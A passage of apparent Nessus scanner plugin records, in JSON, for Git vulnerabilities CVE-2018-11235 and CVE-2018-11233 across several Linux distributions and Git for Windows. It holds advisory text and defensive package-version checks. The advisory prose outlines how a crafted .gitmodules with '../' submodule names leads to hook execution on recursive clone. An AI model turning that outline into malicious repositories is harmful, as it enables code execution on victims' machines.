(deb_check(release:\"8.0\", prefix:\"git-svn\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"gitk\", 
reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"gitweb\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-all\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-arch\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-core\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-cvs\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-daemon-run\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-daemon-sysvinit\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-doc\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-el\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-email\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-gui\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-man\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-mediawiki\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-svn\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"gitk\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"gitweb\", reference:\"1:2.11.0-3+deb9u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:54:34", "description": "An update for git is now available for 
Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-25T00:00:00", "type": "nessus", "title": "CentOS 7 : git (CESA-2018:1957)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2019-12-31T00:00:00", "cpe": ["p-cpe:/a:centos:centos:emacs-git", "p-cpe:/a:centos:centos:emacs-git-el", "p-cpe:/a:centos:centos:git", "p-cpe:/a:centos:centos:git-all", "p-cpe:/a:centos:centos:git-bzr", "p-cpe:/a:centos:centos:git-cvs", "p-cpe:/a:centos:centos:git-daemon", "p-cpe:/a:centos:centos:git-email", "p-cpe:/a:centos:centos:git-gui", "p-cpe:/a:centos:centos:git-hg", "p-cpe:/a:centos:centos:git-p4", "p-cpe:/a:centos:centos:git-svn", "p-cpe:/a:centos:centos:gitk", "p-cpe:/a:centos:centos:gitweb", "p-cpe:/a:centos:centos:perl-Git", "p-cpe:/a:centos:centos:perl-Git-SVN", "cpe:/o:centos:centos:7"], "id": 
"CENTOS_RHSA-2018-1957.NASL", "href": "https://www.tenable.com/plugins/nessus/110663", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:1957 and \n# CentOS Errata and Security Advisory 2018:1957 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110663);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/12/31\");\n\n script_cve_id(\"CVE-2018-11235\");\n script_xref(name:\"RHSA\", value:\"2018:1957\");\n\n script_name(english:\"CentOS 7 : git (CESA-2018:1957)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for git is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized\narchitecture. As opposed to centralized version control systems with a\nclient-server model, Git ensures that each working copy of a Git\nrepository is an exact copy with complete revision history. 
This not\nonly allows the user to work on and contribute to projects without the\nneed to have permission to push the changes to their official\nrepositories, but also makes it possible for the user to work with no\nnetwork connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution when recursively cloning a malicious\nrepository (CVE-2018-11235)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2018-June/022924.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3090cd26\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git-bzr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git-cvs\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:centos:centos:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git-hg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? 
release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"emacs-git-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"emacs-git-el-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-all-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-bzr-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-cvs-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-daemon-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-email-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-gui-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-hg-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-p4-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"git-svn-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"gitk-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"gitweb-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", 
cpu:\"x86_64\", reference:\"perl-Git-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"perl-Git-SVN-1.8.3.1-14.el7_5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / git / git-all / git-bzr / git-cvs / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:54:25", "description": "In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, code to sanity-check pathnames on NTFS can result in reading out-of-bounds memory.(CVE-2018-11233)\n\nIn Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone\n--recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name. 
Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.(CVE-2018-11235)", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-12T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : git (ALAS-2018-1035)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:git", "p-cpe:/a:amazon:linux:git-all", "p-cpe:/a:amazon:linux:git-core", "p-cpe:/a:amazon:linux:git-core-doc", "p-cpe:/a:amazon:linux:git-cvs", "p-cpe:/a:amazon:linux:git-daemon", "p-cpe:/a:amazon:linux:git-debuginfo", "p-cpe:/a:amazon:linux:git-email", "p-cpe:/a:amazon:linux:git-gnome-keyring", "p-cpe:/a:amazon:linux:git-gui", "p-cpe:/a:amazon:linux:git-p4", "p-cpe:/a:amazon:linux:git-svn", "p-cpe:/a:amazon:linux:gitk", "p-cpe:/a:amazon:linux:gitweb", "p-cpe:/a:amazon:linux:perl-Git", "p-cpe:/a:amazon:linux:perl-Git-SVN", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2018-1035.NASL", "href": "https://www.tenable.com/plugins/nessus/110452", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2018-1035.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110452);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:05\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_xref(name:\"ALAS\", value:\"2018-1035\");\n\n script_name(english:\"Amazon Linux 2 : git (ALAS-2018-1035)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux 2 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 
2.15.2,\n2.16.x before 2.16.4, and 2.17.x before 2.17.1, code to sanity-check\npathnames on NTFS can result in reading out-of-bounds\nmemory.(CVE-2018-11233)\n\nIn Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2,\n2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution\ncan occur. With a crafted .gitmodules file, a malicious project can\nexecute an arbitrary script on a machine that runs 'git clone\n--recurse-submodules' because submodule 'names' are obtained from this\nfile, and then appended to $GIT_DIR/modules, leading to directory\ntraversal with '../' in a name. Finally, post-checkout hooks from a\nsubmodule are executed, bypassing the intended design in which hooks\nare not obtained from a remote server.(CVE-2018-11235)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/AL2/ALAS-2018-1035.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update git' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-core-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-gnome-keyring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"git-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"git-all-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"git-core-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"git-core-doc-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"git-cvs-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"git-daemon-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"git-debuginfo-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"git-email-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"git-gnome-keyring-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"git-gui-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"git-p4-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", 
cpu:\"x86_64\", reference:\"git-svn-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"gitk-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"gitweb-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"perl-Git-2.14.4-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"perl-Git-SVN-2.14.4-1.amzn2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git / git-all / git-core / git-core-doc / git-cvs / git-daemon / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T13:16:57", "description": "The version of Git for Windows installed on the remote host is 2.13.x prior to 2.13.7, 2.14.x prior to 2.14.4, 2.15.x prior to 2.15.2, 2.16.x prior to 2.16.4 or 2.17.x prior to 2.17.1. 
It is, therefore, affected by a remote code execution vulnerability.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-01T00:00:00", "type": "nessus", "title": "Git for Windows 2.13.x < 2.13.7 / 2.14.x < 2.14.4 / 2.15.x < 2.15.2 / 2.16.x < 2.16.4 / 2.17.x < 2.17.1 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-11-04T00:00:00", "cpe": ["cpe:/a:git_for_windows_project:git_for_windows"], "id": "GIT_FOR_WINDOWS_2_17_1.NASL", "href": "https://www.tenable.com/plugins/nessus/110270", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110270);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(english:\"Git for Windows 2.13.x < 2.13.7 / 2.14.x < 2.14.4 / 2.15.x < 2.15.2 / 2.16.x < 2.16.4 / 2.17.x < 2.17.1 Remote Code Execution\");\n script_summary(english:\"Checks the version of git.exe.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application installed that is affected\n by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Git for Windows installed on the remote host is 2.13.x\n prior to 2.13.7, 2.14.x prior to 2.14.4, 2.15.x prior to 2.15.2,\n 2.16.x prior to 2.16.4 or 2.17.x prior to 2.17.1. 
It is,\n therefore, affected by a remote code execution vulnerability.\");\n # https://marc.info/?l=git&m=152761328506724&w=2\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6b8dff24\");\n # https://github.com/git-for-windows/git/releases/tag/v2.17.1.windows.2\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f1267c9c\");\n # https://github.com/git/git/blob/master/Documentation/RelNotes/2.13.7.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8f45ca93\");\n # https://github.com/git/git/blob/master/Documentation/RelNotes/2.14.4.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dbe82e91\");\n # https://github.com/git/git/blob/master/Documentation/RelNotes/2.15.2.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ff69b9fa\");\n # https://github.com/git/git/blob/master/Documentation/RelNotes/2.16.4.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0c6c2dec\");\n # https://github.com/git/git/blob/master/Documentation/RelNotes/2.17.1.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d150bb79\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Git for Windows 2.13.7 / 2.14.4 / 2.15.2 / 2.16.4 / 2.17.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:git_for_windows_project:git_for_windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"git_for_windows_installed.nbin\");\n script_require_keys(\"installed_sw/Git for Windows\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_name = \"Git for Windows\";\n\napp_info = vcf::get_app_info(app:app_name, win_local:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.13\", \"fixed_version\" : \"2.13.7\" },\n { \"min_version\" : \"2.14\", \"fixed_version\" : \"2.14.4\" },\n { \"min_version\" : \"2.15\", \"fixed_version\" : \"2.15.2\" },\n { \"min_version\" : \"2.16\", \"fixed_version\" : \"2.16.4\" },\n { \"min_version\" : \"2.17\", \"fixed_version\" : \"2.17.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:28:57", "description": "Upstream security fixes related to .gitmodules handling. From the [upstream announcement](https://public-inbox.org/git/xmqqy3g2flb6.fsf@gitster-ct.c.googlers.com/) :\n\n```\n\n - Submodule 'names' come from the untrusted .gitmodules file, but we blindly append them to $GIT_DIR/modules to create our on-disk repo paths. This means you can do bad things by putting '../' into the name.
We now enforce some rules for submodule names which will cause Git to ignore these malicious names (CVE-2018-11235).\n\n Credit for finding this vulnerability and the proof of concept from which the test script was adapted goes to Etienne Stalmans.\n\n - It was possible to trick the code that sanity-checks paths on NTFS into reading random piece of memory (CVE-2018-11233). ```\n\nA preliminary patch to resolve an issue with zlib on aarch64 is also included (RHBZ#1582555).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : git (2018-75f7624a9f)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:git", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-75F7624A9F.NASL", "href": "https://www.tenable.com/plugins/nessus/120535", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-75f7624a9f.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120535);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_xref(name:\"FEDORA\", value:\"2018-75f7624a9f\");\n\n script_name(english:\"Fedora 28 